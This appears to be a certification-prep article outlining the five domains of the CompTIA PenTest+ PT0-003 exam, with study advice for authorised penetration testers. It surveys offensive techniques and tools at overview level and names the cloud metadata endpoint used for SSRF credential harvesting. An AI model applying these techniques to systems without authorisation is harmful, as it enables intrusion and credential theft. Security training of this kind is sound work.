CertQuests
The gap in the CompTIA path that PenTest+ fills
CompTIA Security+ proves you understand how defenses work. CompTIA CASP+ proves you can architect enterprise-level security programmes. But neither credential proves you can plan a penetration test, execute an attack chain, and deliver findings a remediation team can actually use. That gap — between knowing security theory and demonstrating offensive capability — is exactly where PenTest+ sits.
The November 2024 PT0-003 update reflects how the attack surface has shifted. The previous version was written before generative AI tools became standard equipment for both attackers and defenders, before cloud-native IAM privilege escalation became a headline-grabbing technique, and before code analysis became a realistic expectation for any pentester submitting deliverables. PT0-003 corrects all three gaps. The exam costs $404 USD, runs at Pearson VUE testing centres and online, and carries DoD 8140 IAT/IAM Level II and III approval — making it relevant for both commercial red-team roles and US government and defense contractor positions.
PenTest+ is not a memorisation exam. The performance-based questions present a scenario — a network diagram, a Nmap output, a web application response — and ask what to do next. Studying attack tools in isolation is not enough. You need to know the attack narrative: reconnaissance leads to scanning, scanning surfaces vulnerabilities, exploitation gains a foothold, post-exploitation expands access. Walk through complete engagement chains in lab environments, not just individual tool exercises.
The five exam domains
CompTIA publishes the full exam objectives at comptia.org. The five domains and their approximate weightings are:
Domain 1 — Planning and Scoping (14%)
Every engagement begins before the first port scan. Know the core scoping documents: rules of engagement (RoE), statement of work (SoW), and authorisation letters. Understand the difference between black-box (no prior knowledge), grey-box (partial knowledge, like a credentialed internal user), and white-box (full architecture access) engagements — the exam gives you a client scenario and asks which testing type is appropriate. Cover compliance considerations: PCI DSS and HIPAA environments restrict testing windows and scope definitions. Know what is explicitly out of scope and the legal consequences of exceeding it, including the Computer Fraud and Abuse Act (CFAA) in US contexts.
Domain 2 — Information Gathering and Vulnerability Scanning (22%)
The heaviest passive and active reconnaissance domain. OSINT techniques: WHOIS lookups, DNS enumeration (dig, nslookup, zone transfer attempts), Google dorking with site: and filetype: operators, Shodan for internet-exposed services, and LinkedIn for organisational structure mapping. Active scanning: Nmap fundamentals — -sS for SYN scans, -sV for service version detection, -O for OS fingerprinting, -A for aggressive scanning, -p- for all 65,535 ports. Vulnerability scanning with Nessus and OpenVAS; Nikto and OWASP ZAP for web application targets. Know the difference between authenticated and unauthenticated scans and when each produces more reliable results. CVSS v3 scoring: understand the Base Score components (Attack Vector, Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability) and how they map to risk prioritisation decisions.
Domain 3 — Attacks and Exploits (30%)
The largest and most technically demanding domain. Network attacks: ARP spoofing and VLAN hopping for lateral movement, Man-in-the-Middle interception with Wireshark or Responder for credential capture on Windows networks. Web application attacks: SQL injection (error-based, UNION-based, blind boolean, and time-based blind), cross-site scripting (reflected, stored, and DOM-based), CSRF token bypass, and directory traversal. Password attacks: Hydra or Medusa for online brute force, Hashcat for offline GPU cracking, and pass-the-hash against Windows NTLM authentication. Social engineering: phishing campaigns, vishing, and pretexting — PT0-003 explicitly adds AI-generated phishing lures as a distinct technique, reflecting the real-world adoption of LLMs for targeted spear-phishing content. Metasploit: msfconsole workflow, use / set / run, payload selection (msfvenom), and Meterpreter post-exploitation commands. Cloud-specific attacks: AWS IAM privilege escalation via misconfigured role trust policies, S3 bucket enumeration for exposed data, and EC2 instance metadata SSRF (http://169.254.169.254/) for credential harvesting — a newly weighted area in PT0-003.
Domain 4 — Reporting and Communication (18%)
A pentester who cannot communicate findings is a liability. Know the components of a professional penetration test report: the executive summary (business-language risk narrative for non-technical stakeholders), the technical findings section (per-vulnerability detail for engineers), and the remediation roadmap (prioritised fix list with effort estimates). Each finding should follow a consistent structure: description, affected asset, CVSS score, evidence (screenshots and log excerpts), proof-of-concept reproduction steps, and specific remediation guidance. Understand risk presentation: severity ratings must be contextualised against the client’s environment — a high-CVSS vulnerability on an air-gapped test server carries different business risk than the same CVE on an internet-facing payment processor. Post-engagement activities: evidence handling, data destruction requirements, and the difference between a remediation verification retest and a full follow-on engagement.
Domain 5 — Tools and Code Analysis (16%)
The domain added most substantially in PT0-003. The exam shows Python, PowerShell, or Bash snippets and asks what they do, what they output, or where they fail. Know Python for scripting reconnaissance automation and post-exploitation tasks — the requests library for HTTP interactions, socket for raw network operations, and subprocess for shell commands. Know common offensive Bash patterns: reverse shell one-liners, file transfer tricks via curl and wget, and cron persistence. Recognise obfuscation techniques: Base64-encoded payloads, character substitution in PowerShell commands, and environment variable abuse. Core tooling: Burp Suite for intercepting and modifying web application traffic, Wireshark for protocol-level packet analysis, Hashcat for password cracking, and CrackMapExec (CME) for Active Directory enumeration and lateral movement.
The mistake most Security+ holders make when beginning PenTest+ preparation: they study attack tools independently rather than practicing complete engagement chains. The exam scenarios describe an in-progress penetration test and ask what to do next given the evidence on screen. Knowing how to run Nmap is not enough — you need to know how the Nmap output informs your Metasploit module selection, which informs your Meterpreter privilege escalation path, which informs the finding you write in your report. Complete at least one full engagement walkthrough on HackTheBox or TryHackMe per week during prep. The narrative structure that builds is exactly what the performance-based questions test.
Where PT0-003 leads on the cert map
PenTest+ sits at the practitioner tier of CompTIA’s cybersecurity pathway, above Security+ and below CASP+. Candidates who complete PT0-003 are well-positioned for CompTIA CASP+ CAS-004 (CompTIA’s expert-level security architecture credential) and for vendor-specific offensive certifications: the EC-Council CEH (Certified Ethical Hacker) covers broadly similar territory from a knowledge-testing perspective, while the Offensive Security OSCP (OffSec Certified Professional) is the industry-recognised practical exam that tests 24-hour exploitation on a live network — the most rigorous real-world validation in offensive security.
PenTest+ is also DoD 8140 approved at IAT Level II and IAM Level III, qualifying holders for penetration tester, vulnerability analyst, and information assurance roles in US government and defense contractor environments. For professionals working toward a red team or threat intelligence career, PT0-003 stacks cleanly with CySA+ (blue team perspective) or eJPT (practical entry-level) as part of a well-rounded security credential portfolio.
The cybersecurity workforce gap is sharpest in offensive security: penetration testers and red team operators remain among the highest-demand, highest-compensation roles in the industry. CompTIA PenTest+ PT0-003 is the structured, vendor-neutral pathway from defensive security knowledge to offensive capability — DoD approved, updated for cloud and AI-era threats, and covering the full engagement lifecycle from scoping through reporting. Typical preparation is 4–6 weeks for candidates who already hold Security+ and have hands-on lab experience. Pair the official CompTIA CertMaster Learn materials with at least one practical lab platform (HackTheBox Academy or TryHackMe) and practise writing professional findings reports — Domain 4 is consistently underestimated in preparation and heavily weighted on the actual exam.
Ready to reinforce the security fundamentals that underpin every PenTest+ domain? Test yourself on Security+ SY0-701 concepts — the knowledge layer every penetration tester builds on.
Start Security+ Practice Questions →